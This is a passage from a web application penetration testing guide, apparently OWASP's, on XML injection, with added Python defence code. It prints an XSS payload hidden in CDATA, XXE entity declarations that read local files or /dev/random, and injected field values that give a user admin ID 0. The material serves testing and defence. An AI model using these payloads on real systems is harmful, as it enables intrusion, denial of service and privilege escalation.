Web Application Penetration Testing
userName = ]]>
this will become:
<username><![CDATA[]]>]]></username>
which is not a valid XML fragment.
Another test is related to the CDATA tag. Suppose that the XML document
is processed to generate an HTML page. In this case, the CDATA section
delimiters may simply be eliminated, without further inspecting
their contents. Then, it is possible to inject HTML tags, which will be
included in the generated page, completely bypassing existing sanitization
routines.
Let's consider a concrete example. Suppose we have a node containing
some text that will be displayed back to the user:
<html>
$HTMLCode
</html>
Then, an attacker can provide the following input:
$HTMLCode = <![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
and obtain the following node:
<html>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>
</html>
During the processing, the CDATA section delimiters are eliminated,
generating the following HTML code:
<script>alert('xss')</script>
The result is that the application is vulnerable to XSS.
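The two CDATA problems above (an injected ]]> that breaks well-formedness, and delimiters stripped textually so that the character data is emitted straight into the page as HTML) can be reproduced side by side with a correct pipeline. This is an added example written for this page, not code from the OWASP guide; it uses only Python's standard xml.etree and html modules, and the <html> wrapper node and the make_node / render_naive / render_safe function names are assumptions standing in for the application's own page generator.

```python
import html
import re
import xml.etree.ElementTree as ET

# Constructed attacker-controlled value, taken from the example above.
HTML_CODE = ("<![CDATA[<]]>script<![CDATA[>]]>alert('xss')"
             "<![CDATA[<]]>/script<![CDATA[>]]>")


def make_node(value):
    """Build the node the way the page's application does: the user value
    is dropped between the <html> tags as-is (hypothetical wrapper)."""
    return f"<html>{value}</html>"


def is_well_formed(xml_text):
    """True if a real XML parser accepts the fragment.  A stray ']]>' in
    character data is forbidden by the XML spec, so the userName = ]]>
    test from the page is rejected here."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


def render_naive(node):
    """Vulnerable generator: removes the CDATA delimiters with a textual
    substitution and emits whatever is left straight into the page."""
    inner = node[len("<html>"):-len("</html>")]
    return re.sub(r"<!\[CDATA\[|\]\]>", "", inner)


def render_safe(node):
    """Hardened generator: let the XML parser resolve CDATA sections into
    character data, then HTML-escape that data before it reaches the page.
    Whatever the CDATA trick produced is now inert text."""
    root = ET.fromstring(node)
    return html.escape(root.text or "")


if __name__ == "__main__":
    node = make_node(HTML_CODE)
    print("well-formed :", is_well_formed(node))
    print("naive       :", render_naive(node))   # live <script> tag
    print("safe        :", render_safe(node))    # escaped, harmless
    print("']]>' test  :", is_well_formed("<username><![CDATA[]]>]]></username>"))
```

The point of render_safe is that the parser, not a regular expression, decides where a CDATA section ends; once the content is plain character data, the usual HTML output encoding applies and the CDATA trick buys the attacker nothing.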
External Entity:
The set of valid entities can be extended by defining new entities. If
the definition of an entity is a URI, the entity is called an external entity.
Unless configured to do otherwise, external entities force the XML
parser to access the resource specified by the URI, e.g., a file on the
local machine or on a remote system. This behavior exposes the application
to XML eXternal Entity (XXE) attacks, which can be used to
perform denial of service of the local system, gain unauthorized access
to files on the local machine, scan remote machines, and perform
denial of service of remote systems.
To test for XXE vulnerabilities, one can use the following input:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>
This test could crash the web server (on a UNIX system), if the XML
parser attempts to substitute the entity with the contents of the
/dev/random file.
Other useful tests use the same document with a different SYSTEM URI in
the entity declaration: a file:// path to a file on the local machine, or
an http:// URL on a remote host, to check whether the parser reaches out
to it. The URI is the only part that changes:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "URI-UNDER-TEST" >]><foo>&xxe;</foo>
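From the defender's side, the cheapest way to close XXE is to refuse the DTD altogether: an external entity can only be declared inside a DOCTYPE, and untrusted input has no legitimate reason to carry one. This is an added example written for this page, not code from the OWASP guide; it uses only Python's standard expat and ElementTree modules, assumes the untrusted document arrives as a string, and the reject_dtd / parse_untrusted / classify names are assumptions.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXML(Exception):
    """Raised when untrusted XML carries a DOCTYPE or an entity declaration."""


def reject_dtd(data):
    """Pre-parse gate.  Abort on the first DOCTYPE or entity declaration,
    before any parser gets a chance to resolve a SYSTEM URI.  Uses expat's
    declaration callbacks; raising inside a callback aborts Parse()."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE for <{name}> not allowed in untrusted input")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML(f"entity {name!r} (SYSTEM={sysid!r}) not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_untrusted(data, gate=True):
    """Parse with the gate in front (gate=False shows what the bare parser does)."""
    if gate:
        reject_dtd(data)
    return ET.fromstring(data)


def classify(data, gate=True):
    """One-line verdict suitable for a detection log: 'ok:<root>',
    'rejected:<reason>' from the gate, or 'malformed:<parser error>'."""
    try:
        root = parse_untrusted(data, gate)
    except UnsafeXML as exc:
        return "rejected:" + str(exc)
    except ET.ParseError as exc:
        return "malformed:" + str(exc)
    return "ok:" + root.tag


# Constructed samples: the page's /dev/random probe and a benign record.
XXE_PROBE = ('<?xml version="1.0"?>\n'
             '<!DOCTYPE foo [\n'
             '<!ELEMENT foo ANY >\n'
             '<!ENTITY xxe SYSTEM "file:///dev/random" >]><foo>&xxe;</foo>')
BENIGN = ('<?xml version="1.0"?>'
          '<user><username>gandalf</username><userid>0</userid></user>')

if __name__ == "__main__":
    for label, doc in (("probe", XXE_PROBE), ("benign", BENIGN)):
        print(f"{label:7s} gated   -> {classify(doc)}")
        print(f"{label:7s} ungated -> {classify(doc, gate=False)}")
```

Two caveats. The gate rejects every DOCTYPE, including harmless ones, so it belongs in front of endpoints that accept machine-generated XML from outside, not in a generic document pipeline. And the ungated branch reports "malformed" rather than reading /dev/random only because Python's xml.etree does not expand external entities at all (it raises ParseError on the reference); parsers that do resolve them are exactly the ones the gate is for, and a "rejected:DOCTYPE" verdict is a clean signal to alert on.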
Tag Injection
Once the first step is accomplished, the tester will have some information
about the structure of the XML document. Then, it is possible
to try to inject XML data and tags. We will show an example of how
this can lead to a privilege escalation attack.
Let's consider the previous application. By inserting the following
values:
Username: tony
Password: Un6R34kb!e
E-mail: s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com
the application will build a new node and append it to the XML database:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com</mail>
</user>
</users>
The resulting XML file is well formed. Furthermore, it is likely that,
for the user tony, the value associated with the userid tag is the
one appearing last, i.e., 0 (the admin ID). In other words, we have
injected a user with administrative privileges.
The only problem is that the userid tag appears twice in the last
user node. Often, XML documents are associated with a schema
or a DTD and will be rejected if they don't comply with it.
Let's suppose that the XML document is specified by the following
DTD:
<!DOCTYPE users [
<!ELEMENT users (user+) >
<!ELEMENT user (username,password,userid,mail+) >
<!ELEMENT username (#PCDATA) >
<!ELEMENT password (#PCDATA) >
<!ELEMENT userid (#PCDATA) >
<!ELEMENT mail (#PCDATA) >
]>
Note that the userid node is defined with cardinality 1. In this case,
the attack we have shown before (and other simple attacks) will
not work, if the XML document is validated against its DTD before
any processing occurs.
However, this problem can be solved, if the tester controls the value
of some nodes preceding the offending node (userid, in this example).
In fact, the tester can comment out such a node, by injecting
a comment start/end sequence:
Username: tony
Password: Un6R34kb!e</password><!--
E-mail: --><userid>0</userid><mail>s4tan@hell.com
In this case, the final XML database is:
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password><!--</password>
<userid>500</userid>
<mail>--><userid>0</userid><mail>s4tan@hell.com</mail>
</user>
</users>
The original userid node has been commented out, leaving only the
injected one. The document now complies with its DTD rules.
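Both tag-injection attempts above, the double userid and the comment-out bypass, succeed only because the application pastes field values into markup. The example below reproduces that builder, shows why DTD-style cardinality checking stops the first attempt but not the second, and contrasts it with a builder that fixes the structure in code. This is an added example written for this page, not code from the OWASP guide; it uses only Python's standard ElementTree, which has no DTD validator, so complies_with_dtd is a hand-written stand-in for the page's DTD rule, and the build_user_unsafe / build_user_safe names are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed inputs: the two injection attempts shown above for user "tony".
MAIL_INJECTION = "s4tan@hell.com</mail><userid>0</userid><mail>s4tan@hell.com"
PASSWORD_COMMENT_OPEN = "Un6R34kb!e</password><!--"
MAIL_COMMENT_CLOSE = "--><userid>0</userid><mail>s4tan@hell.com"


def build_user_unsafe(username, password, userid, mail):
    """Vulnerable builder: the application concatenates the field values into
    markup, so a value containing '<', '>' or '<!--' rewrites the node."""
    return (f"<user><username>{username}</username>"
            f"<password>{password}</password>"
            f"<userid>{userid}</userid>"
            f"<mail>{mail}</mail></user>")


def build_user_safe(username, password, userid, mail):
    """Hardened builder: values go in as text nodes and the serializer
    escapes '<', '>' and '&', so the structure is fixed by the code alone."""
    user = ET.Element("user")
    for tag, value in (("username", username), ("password", password),
                       ("userid", str(userid)), ("mail", mail)):
        ET.SubElement(user, tag).text = value
    return ET.tostring(user, encoding="unicode")


def userids(user_xml):
    """All <userid> values in document order; the page assumes the last one wins."""
    return [e.text for e in ET.fromstring(user_xml).findall("userid")]


def complies_with_dtd(user_xml):
    """Stand-in for validating against the page's DTD: exactly one <userid>
    and at least one <mail> per user (cardinality checked by hand because
    ElementTree does not validate against a DTD)."""
    root = ET.fromstring(user_xml)
    return len(root.findall("userid")) == 1 and len(root.findall("mail")) >= 1


if __name__ == "__main__":
    attack1 = build_user_unsafe("tony", "Un6R34kb!e", 500, MAIL_INJECTION)
    attack2 = build_user_unsafe("tony", PASSWORD_COMMENT_OPEN, 500, MAIL_COMMENT_CLOSE)
    safe = build_user_safe("tony", "Un6R34kb!e", 500, MAIL_INJECTION)
    for label, doc in (("tag injection", attack1),
                       ("comment bypass", attack2),
                       ("safe builder", safe)):
        print(f"{label:15s} userids={userids(doc)} dtd_ok={complies_with_dtd(doc)}")
```

Running it shows the first attempt producing two userid elements and failing the cardinality check, the comment bypass producing a single injected userid of 0 that passes it, and the safe builder storing the whole injected string as the literal mail text with userid still 500. Schema validation is a useful second line, but only escaping (or building nodes through the XML API) removes the injection itself.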
Tools
• XML Injection Fuzz Strings (from wfuzz tool) - https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt
References
Whitepapers
• Alex Stamos: "Attacking Web Services" - http://www.owasp.org/images/d/d1/AppSec2005DC-Alex_Stamos-Attacking_Web_Services.ppt
• Gregory Steuck, "XXE (Xml eXternal Entity) attack", http://www.securityfocus.com/archive/1/297714
Testing for SSI Injection (OTG-INPVAL-009)
Summary
Web servers usually give developers the ability to add small pieces of
dynamic code inside static HTML pages, without having to deal with
full-fledged server-side or client-side languages. This feature is provided
by Server-Side Includes (SSI). In SSI injection testing, we test
whether it is possible to inject into the application data that will be interpreted
by SSI mechanisms. Successful exploitation of this vulnerability
allows an attacker to inject code into HTML pages or even perform
remote code execution.
Server-Side Includes are directives that the web server parses before